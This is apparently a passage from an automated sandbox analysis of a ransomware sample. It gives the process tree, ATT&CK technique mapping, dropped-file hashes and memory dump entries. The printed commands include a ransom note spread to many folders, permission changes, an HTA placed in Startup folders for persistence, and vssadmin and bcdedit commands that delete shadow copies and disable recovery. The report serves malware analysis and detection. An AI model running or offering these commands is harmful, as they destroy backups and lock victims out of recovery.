        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{CA675~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1924
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{EF6B0~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1456
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Default\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2296
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\Default\NTUSER.DAT.LOG2" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\Default\NTUSER.DAT.LOG2"
        5⤵
        
        PID:3068
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\Default\NTUSER.DAT.LOG2" /E /G Admin:F /C
        6⤵
        
        PID:2416
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\Default\NTUSER.DAT.LOG2"
        6⤵
        Views/modifies file attributes
        
        PID:1000
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Public\LIBRAR~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:844
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\VCFPLA~1\MVBJbShf.exe" > "C:\Users\Admin\AppData\Local\Temp\OhxPtW9C.exe" && "C:\Users\Admin\AppData\Local\Temp\OhxPtW9C.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "TOTALCIP_228" "60000"
        5⤵
        Loads dropped DLL
        
        PID:1812
      - C:\Users\Admin\AppData\Local\Temp\OhxPtW9C.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OhxPtW9C.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "TOTALCIP_228" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\OhxPtW9C.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OhxPtW9C.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "TOTALCIP_228" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:2304
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\WhQNxo5p.cmd"
        8⤵
        
        PID:2696
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:1240
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\VCFPLA~1\MVBJbShf.exe" > "C:\Users\Admin\AppData\Local\Temp\mMXTUENU.exe" && "C:\Users\Admin\AppData\Local\Temp\mMXTUENU.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "FINISH" "60000"
        5⤵
        Loads dropped DLL
        
        PID:2804
      - C:\Users\Admin\AppData\Local\Temp\mMXTUENU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mMXTUENU.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "FINISH" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1524
        
        C:\Users\Admin\AppData\Local\Temp\mMXTUENU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mMXTUENU.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "FINISH" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:408
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\P59wUORi.cmd"
        8⤵
        
        PID:756
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:2912
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\DOZ0JO~1.HTA" > "C:\Users\Admin\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Doz0JokIxnIySJiJ.hta"
        5⤵
        
        PID:2692
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\DOZ0JO~1.HTA" > "C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\Doz0JokIxnIySJiJ.hta"
        5⤵
        Drops file in Program Files directory
        
        PID:2088
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\cn8aVZuc.cmd"
        5⤵
        
        PID:1768
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 5 localhost
        6⤵
        Runs ping.exe
        
        PID:548
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Doz0JokIxnIySJiJ.hta"
        6⤵
        Modifies Internet Explorer settings
        
        PID:1780
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\O4MnE54p.cmd"
    3⤵
    - Deletes itself
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 3 localhost
      4⤵
      Runs ping.exe
      PID:2524

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
PID:1736
- C:\Windows\system32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:944
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1744
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2872

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Doz0JokIxnIySJiJ.hta

Filesize
3KB

MD5
ace304f43944cd8003c499f30cc50019

SHA1
eaebe42295c4b60acbcf017e86a5b679a141b210

SHA256
42ab02bbb21cdaaa7631fe27aaa611fe107affe68d133436c2a43e705c94017d

SHA512
25ea5b35ee368c1c690a228d3cf6bed6185ffc398b3353e1da8be1be316783a359566476a2f4dfeef4bbdc722d93b1d91ffcf5634f5505876d2070b7340f63e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\kuox1i4d.exe

Filesize
363KB

MD5
36a0cefeb8b0a606358142d4140ea7cf

SHA1
03ce13b4f60d2fc632b67b41b82b5e8cfaf9939f

SHA256
467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be

SHA512
63304f3ddca578beac157197581e6a2a762d9cf1fb08fa6ae85dcdc26340ae64badb0f4a9cb47521315c366b70bd0cf89bf1b72be29f89e2d91504cec7ca9093

Download Submit
C:\Users\Admin\AppData\Roaming\WhatHappenedWithFiles.rtf

Filesize
5KB

MD5
e577043d8a80899885919d6401d0a1bf

SHA1
1237b91c3750633c02bb01dfbc2aa36c4ae117c4

SHA256
9c262391c3b87e98d33b8adec7e25918601d75c734d8d554ce424787bf658419

SHA512
107aaa7f7bbffb63ef0c1131dd0a0345c3682f3d8aa8f77f80f381859373d15fb07a79dab0f6437abc81ddd4272b4ac6f6dc19860d5ac9a9751bca4940b20644

Download Submit
C:\Users\Admin\AppData\Roaming\vcfPlARarToX\Mg7xeg5b.cmd

Filesize
141B

MD5
e0112890aa81621e5b861e3174006107

SHA1
695474de1d10a6318a2a13de8a1968dffba7a766

SHA256
82af436448896434358928b44d9eef615ef1856829fc528abd6e54d380e96704

SHA512
f2c3881a49889e8d7fca4b56440a9052a40e40d738bae810ba98c24488952a1860082f73bec2ad702d793a926c775ae57ad842ce1e97fa3bbb4dd8ba959ccc69

Download Submit
C:\Users\Admin\AppData\Roaming\vcfPlARarToX\O4MnE54p.cmd

Filesize
141B

MD5
70e41798d78ff99f023db4d3e2ad495d

SHA1
1316c3b1481f5e7e0cf61ed1d17701a6620ecd0f

SHA256
f419b969138c8966126c2866f8930ba41498ab6cfb3ed259ac3e59afe7fc41b9

SHA512
70815985783d2a87aba07cfb746810bc8ec7e59fdc1aad9eaf5af7ae1034a0cadd7d28ad85781c61fb31f3e313b4ecf9f7db387a128738c5f295976ce9a905b4

Download Submit
C:\Users\Admin\AppData\Roaming\vcfPlARarToX\Ut9TNzlQ.cmd

Filesize
141B

MD5
cbd5669f38420d6dcdeef6fb7061a1c1

SHA1
3c0a0954cc05b131790927f45f537f9d69fa21e4

SHA256
18fbd58e07ba33b754652f7ac17955a33e29abbf29c05b320bd7e9d503d756d8

SHA512
ca466ee33f123083ac7fc593d3c254e76deffe9988001f4ef796445708eaa1b50c7071ddeef2584ab77cc8c5472d941da0e7dbbc9a85ce1dcf31ea3741f1f4f8

Download Submit
memory/408-738-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/408-721-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/688-105-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/688-690-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1568-383-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1568-405-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1660-553-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1660-561-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2192-705-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2192-66-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2236-9-0x00000000002D8000-0x000000000031A000-memory.dmp

Filesize
264KB

Download
memory/2244-135-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2244-141-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2244-123-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2304-743-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2304-735-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2400-693-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2400-136-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2552-439-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2552-464-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2672-3-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2672-10-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2672-8-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2672-13-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2672-12-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2672-11-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2672-7-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2672-5-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2672-4-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2672-1-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2672-30-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2692-477-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2692-456-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2868-473-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2868-427-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2972-344-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2972-368-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/3020-46-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/3020-47-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/3020-48-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/3020-52-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download